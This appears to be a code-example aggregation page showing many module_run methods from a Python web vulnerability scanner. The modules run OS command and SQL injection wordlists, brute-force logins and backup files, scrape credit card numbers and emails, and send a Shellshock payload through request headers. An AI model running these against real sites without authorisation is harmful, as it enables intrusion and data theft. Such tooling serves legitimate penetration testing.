Ejemplo n.º 1
0
 def module_run(self):
     path = os.path.join(self.data_path,'os_command_injection.galileo')
     test('Injecting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     headers = self.options['headers']
     status = self.options['status']
     url_path = self.options['url_path']
     wordlist = self.options['wordlist'] if self.options['wordlist']!=('' or None) else path
     url = check_url(check_end(host,url_path),port)
     for payload in readfile(wordlist):
         random_string = rand_all(20)
         payload = payload.replace('[PAYLOAD]',random_string) 
         if method == 'GET':
             urls = Replace(url,payload,data).run()
             for url_ in urls:
                 print(url_)
                 resp = self.request(url=url_,method=method,data=data)
                 if re.search(random_string,resp.content,re.I):
                     plus('OS Command Vulnerability was found: %s'%(resp.url))
                     return
         elif method == 'POST':
             url_ = Replace(url,payload,data).run()[:1]
             data_= Replace(url,payload,data).run()[1:]
             for _url_ in url_:
                 for data in data_:
                     resp = self.request(url=_url_,method=method,data=data)
                     if re.search(random_string,resp.content,re.I):
                         plus('OS Command Vulnerability was found:\n \_ URL => %s\n \_ DATA => %s'%(resp.url,data))
                         return
         else:return
Ejemplo n.º 2
0
 def module_run(self):
     path = os.path.join(self.data_path,'sql_injection.galileo')
     test('Injecting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     wordlist = self.options['wordlist'] if self.options['wordlist']!=('' or None) else path
     url = check_url(check_end(host,url_path),port)
     for payload in readfile(wordlist):
         if method == 'GET':
             urls = Replace(url,payload,data).run()
             for url_ in urls:
                 resp = self.request(url=url_,method=method,data=data)
                 name,error = sql_error(resp.content)
                 if name and error:
                     plus('SQL Injection was found: %s'%(resp.url))
                     print(' \_ DBMS => %s\n \_ ERROR => %s'%(name,error))
                     return
         elif method == 'POST':
             url_ = Replace(url,payload,data).run()[:1]
             data_= Replace(url,payload,data).run()[1:]
             for _url_ in url_:
                 for data in data_:
                     resp = self.request(url=_url_,method=method,data=data)
                     name,error = sql_error(resp.content)
                     if name and error:
                         plus('SQL Injection was found: %s'%(resp.url))
                         print(' \_ DATA => %s\n \_ NAME => %s\n \_ ERROR => %s'%(data,name,error))
                         return
         else:
             return
Ejemplo n.º 3
0
 def module_run(self):
     test('Starting bruteforce...')
     host = self.options['host']
     port = self.options['port']
     method = self.options['method']
     wordlist = self.options['wordlist']
     url_path = self.options['url_path']
     url_ = check_url(check_end(host,url_path),port)
     for line in readfile(self.check(wordlist)):
         url = check_end(url_,line)
         self.thread(url,method)
Ejemplo n.º 4
0
 def module_run(self):
     test('Detecting...')
     host = self.options['host']
     port = self.options['port']
     url_path = self.options['url_path']
     url = check_url(check_end(host,url_path),port)
     for m in ['GET','HEAD','BLABLA','OPTIONS','DELETE']:
     	resp = self.request(url=url,method=m)
     	if 'server' in resp.headers.keys():
     		plus('Detect Server: %s'%(resp.headers['server']))
     		return
Ejemplo n.º 5
0
 def module_run(self):
     test('Starting bruteforce...')
     host = self.options['host']
     port = self.options['port']
     method = self.options['method']
     wpass = self.options['wpass']
     wuser = self.options['wuser']
     url_path = self.options['url_path']
     url = check_url(check_end(host,url_path),port)
     for user in readfile(self.check(wuser)):
         for passwd in readfile(self.check(wpass)):
             self.thread(url,method,user,passwd)
Ejemplo n.º 6
0
 def module_run(self):
     test('Starting bruteforce...')
     host = self.options['host']
     port = self.options['port']
     method = self.options['method']
     wpass = self.options['wpass']
     wuser = self.options['wuser']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     for user in readfile(self.check(wuser)):
         for passwd in readfile(self.check(wpass)):
             self.thread(url, method, user, passwd)
Ejemplo n.º 7
0
 def module_run(self):
     test('Detecting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host,url_path),port)
     resp = self.request(url=url,method=method,data=data)
     for cms in ['drupal','joomla','wordpress']:
     	funct = getattr(self,cms)
     	bool_ = funct(resp.headers,resp.content)
     	if bool_:
     		plus('Found %s cms'%(cms.title()))
     		return
Ejemplo n.º 8
0
 def module_run(self):
     test('Scanning...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host,url_path),port)
     for path in ['trace.axd','Trace.axd']:
     	url = check_end(url,path)
     	resp = self.request(url=url,method=method,data=data)
     	if resp.code == 200:
     		if re.search(r'<td><h1>Application Trace</h1></td>',resp.content,re.I):
     			plus('ASP.NET trace was found: %s'%(resp.url))
     			return
Ejemplo n.º 9
0
 def module_run(self):
     test('Detecting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     resp = self.request(url=url, method=method, data=data)
     for cms in ['drupal', 'joomla', 'wordpress']:
         funct = getattr(self, cms)
         bool_ = funct(resp.headers, resp.content)
         if bool_:
             plus('Found %s cms' % (cms.title()))
             return
Ejemplo n.º 10
0
 def module_run(self):
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     regexp = self.options['regexp']
     url_path = self.options['url_path']
     url = check_url(check_end(host,url_path),port)
     resp = self.request(url=url,method=method,data=data)
     bool_,lang = source_code(resp.code,resp.content)
     if bool_ and lang:
         plus2('Code disclosure vulnerability was found in: %s'%(resp.url))
     if bool_ is False and lang is None:
         return
Ejemplo n.º 11
0
 def module_run(self):
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     regexp = self.options['regexp']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     resp = self.request(url=url, method=method, data=data)
     bool_, lang = source_code(resp.code, resp.content)
     if bool_ and lang:
         plus2('Code disclosure vulnerability was found in: %s' %
               (resp.url))
     if bool_ is False and lang is None:
         return
Ejemplo n.º 12
0
 def module_run(self):
     test('Scanning...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     for path in ['trace.axd', 'Trace.axd']:
         url = check_end(url, path)
         resp = self.request(url=url, method=method, data=data)
         if resp.code == 200:
             if re.search(r'<td><h1>Application Trace</h1></td>',
                          resp.content, re.I):
                 plus('ASP.NET trace was found: %s' % (resp.url))
                 return
Ejemplo n.º 13
0
 def module_run(self):
     test('Starting bruteforce...')
     back_ext = [
         ' (copy)/','_copy/', '- Copy/','~/','.7z',
         '.gz','.tar.gz','.tar','.tar.7z','.tar.bz2','.bak',
         '.old','.zip','.rar','.bac','_old','_bak','_backup','1','2','3'
     ]
     host = self.options['host']
     port = self.options['port']
     method = self.options['method']
     wordlist = self.options['wordlist']
     url_path = self.options['url_path']
     extensions = self.to_dict(self.options['exts']) if self.options['exts'] != None else back_ext
     url_ = check_url(check_end(host,url_path),port)
     for dir_ in readfile(self.check(wordlist)):
         for bk in extensions:
             url = check_end(url_,dir_+bk)
             self.thread(url,method)
Ejemplo n.º 14
0
 def module_run(self):
     test('Detecting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     resp = self.request(url=url)
     frameworks = [
         'mvc', 'cakephp', 'cherrypy', 'django', 'flask', 'fuelphp',
         'larvel', 'grails', 'nette', 'rails', 'symfony'
     ]
     for fm in frameworks:
         funct = getattr(self, fm)
         bool_ = funct(resp.headers, resp.content)
         if bool_:
             plus('Found %s Framework' % (funct.__doc__))
             return
Ejemplo n.º 15
0
 def module_run(self):
     test('Detecting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host,url_path),port)
     resp = self.request(url=url)
     frameworks = [
                     'mvc','cakephp','cherrypy','django','flask',
                     'fuelphp','larvel','grails','nette','rails','symfony'
                 ]
     for fm in frameworks:
         funct = getattr(self,fm)
         bool_ = funct(resp.headers,resp.content)
         if bool_:
             plus('Found %s Framework'%(funct.__doc__))
             return
 def module_run(self):
     path = os.path.join(self.data_path, 'os_command_injection.galileo')
     test('Injecting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     headers = self.options['headers']
     status = self.options['status']
     url_path = self.options['url_path']
     wordlist = self.options['wordlist'] if self.options['wordlist'] != (
         '' or None) else path
     url = check_url(check_end(host, url_path), port)
     for payload in readfile(wordlist):
         random_string = rand_all(20)
         payload = payload.replace('[PAYLOAD]', random_string)
         if method == 'GET':
             urls = Replace(url, payload, data).run()
             for url_ in urls:
                 print(url_)
                 resp = self.request(url=url_, method=method, data=data)
                 if re.search(random_string, resp.content, re.I):
                     plus('OS Command Vulnerability was found: %s' %
                          (resp.url))
                     return
         elif method == 'POST':
             url_ = Replace(url, payload, data).run()[:1]
             data_ = Replace(url, payload, data).run()[1:]
             for _url_ in url_:
                 for data in data_:
                     resp = self.request(url=_url_,
                                         method=method,
                                         data=data)
                     if re.search(random_string, resp.content, re.I):
                         plus(
                             'OS Command Vulnerability was found:\n \_ URL => %s\n \_ DATA => %s'
                             % (resp.url, data))
                         return
         else:
             return
Ejemplo n.º 17
0
 def module_run(self):
     # https://stackoverflow.com/questions/9315647/regex-credit-card-number-tests
     cc_regex = {
         'American Express': r'^[34|37][0-9]{14}$',
         'Mastercard':
         r'^(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}$',
         'Visa Card': r'^4[0-9]{12}(?:[0-9]{3})?$',
         'Visa Master Card':
         r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$'
     }
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     regexp = self.options['regexp']
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     c = 0
     resp = self.request(url=url, method=method, data=data)
     try:
         if regexp == ('' or None):
             for item in cc_regex.items():
                 found_cc = re.findall(item[1], resp.content, re.I)
                 if found_cc:
                     c = 1
                     for xx in found_cc:
                         print('%s => %s' % (item[0], xx))
             if c == 0: info('Not found credit cards...')
         elif regexp != ('' or None):
             found_cc = re.findall(regexp, resp.content, re.I)
             if found_cc:
                 for xx in found_cc:
                     print('Found REGEX => %s' % (x))
             else:
                 info('Not found credit cards...')
         else:
             return
     except re.error as e:
         warn(e.message)
Ejemplo n.º 18
0
 def module_run(self):
     path = os.path.join(self.data_path, 'sql_injection.galileo')
     test('Injecting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     wordlist = self.options['wordlist'] if self.options['wordlist'] != (
         '' or None) else path
     url = check_url(check_end(host, url_path), port)
     for payload in readfile(wordlist):
         if method == 'GET':
             urls = Replace(url, payload, data).run()
             for url_ in urls:
                 resp = self.request(url=url_, method=method, data=data)
                 name, error = sql_error(resp.content)
                 if name and error:
                     plus('SQL Injection was found: %s' % (resp.url))
                     print(' \_ DBMS => %s\n \_ ERROR => %s' %
                           (name, error))
                     return
         elif method == 'POST':
             url_ = Replace(url, payload, data).run()[:1]
             data_ = Replace(url, payload, data).run()[1:]
             for _url_ in url_:
                 for data in data_:
                     resp = self.request(url=_url_,
                                         method=method,
                                         data=data)
                     name, error = sql_error(resp.content)
                     if name and error:
                         plus('SQL Injection was found: %s' % (resp.url))
                         print(
                             ' \_ DATA => %s\n \_ NAME => %s\n \_ ERROR => %s'
                             % (data, name, error))
                         return
         else:
             return
Ejemplo n.º 19
0
 def module_run(self):
     # https://www.regular-expressions.info/email.html
     regexp_ = r'[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}'
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     regexp = self.options['regexp'] if self.options['regexp'] != (''or None) else regexp_
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host,url_path),port)
     c = 0
     resp = self.request(url=url,method=method,data=data)
     try:
         found_email = re.findall(regexp,resp.content,re.I)
         if found_email:
             c = 1
             for email in found_email:
                 print('Email => %s'%(email))
         if c == 0:info('Not found emails...')
     except re.error as e:
         warn(e.message)
Ejemplo n.º 20
0
 def module_run(self):
     # https://www.regular-expressions.info/ip.html
     regexp_ = r'[0-9]+(?:\.[0-9]+){3}'
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     regexp = self.options['regexp'] if self.options['regexp'] != (''or None) else regexp_
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host,url_path),port)
     c = 0
     resp = self.request(url=url,method=method,data=data)
     try:
         found_ip = re.findall(regexp,resp.content,re.I)
         if found_ip:
             c = 1
             for ip in found_ip:
                 print('Private IP => %s'%(ip))
         if c == 0:info('Not found private ip...')
     except re.error as e:
         warn(e.message)
Ejemplo n.º 21
0
 def module_run(self):
     r_str = rand_str(30)
     exploit = '() { :;}; echo; echo; echo %s'%(r_str)
     test('Exploiting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     headers = {
             'User-Agent' : exploit,
             'Cookie'     : exploit,
             'Referer'    : exploit
     }
     url = check_url(check_end(host,url_path),port)
     # request 
     resp = self.request(url=url,method=method,data=data,headers=headers)
     if resp.code == 200:
         if re.search(r_str,resp.content,re.I):
             plus('ShellShock was found in: %s'%(resp.url))
         else:return
     else:return
Ejemplo n.º 22
0
 def module_run(self):
     # https://www.regular-expressions.info/email.html
     regexp_ = r'[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}'
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     regexp = self.options['regexp'] if self.options['regexp'] != (
         '' or None) else regexp_
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     c = 0
     resp = self.request(url=url, method=method, data=data)
     try:
         found_email = re.findall(regexp, resp.content, re.I)
         if found_email:
             c = 1
             for email in found_email:
                 print('Email => %s' % (email))
         if c == 0: info('Not found emails...')
     except re.error as e:
         warn(e.message)
Ejemplo n.º 23
0
 def module_run(self):
     # https://www.regular-expressions.info/ip.html
     regexp_ = r'[0-9]+(?:\.[0-9]+){3}'
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     regexp = self.options['regexp'] if self.options['regexp'] != (
         '' or None) else regexp_
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     c = 0
     resp = self.request(url=url, method=method, data=data)
     try:
         found_ip = re.findall(regexp, resp.content, re.I)
         if found_ip:
             c = 1
             for ip in found_ip:
                 print('Private IP => %s' % (ip))
         if c == 0: info('Not found private ip...')
     except re.error as e:
         warn(e.message)
Ejemplo n.º 24
0
 def module_run(self):
     # https://stackoverflow.com/questions/9315647/regex-credit-card-number-tests
     cc_regex  = {
                     'American Express'  :   r'^[34|37][0-9]{14}$',
                     'Mastercard'        :   r'^(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}$',
                     'Visa Card'         :   r'^4[0-9]{12}(?:[0-9]{3})?$',
                     'Visa Master Card'  :   r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$'
     }
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     regexp = self.options['regexp']
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host,url_path),port)
     c = 0
     resp = self.request(url=url,method=method,data=data)
     try:
         if regexp == ('' or None):
             for item in cc_regex.items():
                 found_cc = re.findall(item[1],resp.content,re.I)
                 if found_cc:
                     c = 1
                     for xx in found_cc:
                         print('%s => %s'%(item[0],xx))
             if c == 0:info('Not found credit cards...')
         elif regexp != ('' or None):
             found_cc = re.findall(regexp,resp.content,re.I)
             if found_cc:
                 for xx in found_cc:
                     print('Found REGEX => %s'%(x))
             else:info('Not found credit cards...')
         else:
             return
     except re.error as e:
         warn(e.message)
Ejemplo n.º 25
0
 def module_run(self):
     r_str = rand_str(30)
     exploit = '() { :;}; echo; echo; echo %s' % (r_str)
     test('Exploiting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     headers = {
         'User-Agent': exploit,
         'Cookie': exploit,
         'Referer': exploit
     }
     url = check_url(check_end(host, url_path), port)
     # request
     resp = self.request(url=url, method=method, data=data, headers=headers)
     if resp.code == 200:
         if re.search(r_str, resp.content, re.I):
             plus('ShellShock was found in: %s' % (resp.url))
         else:
             return
     else:
         return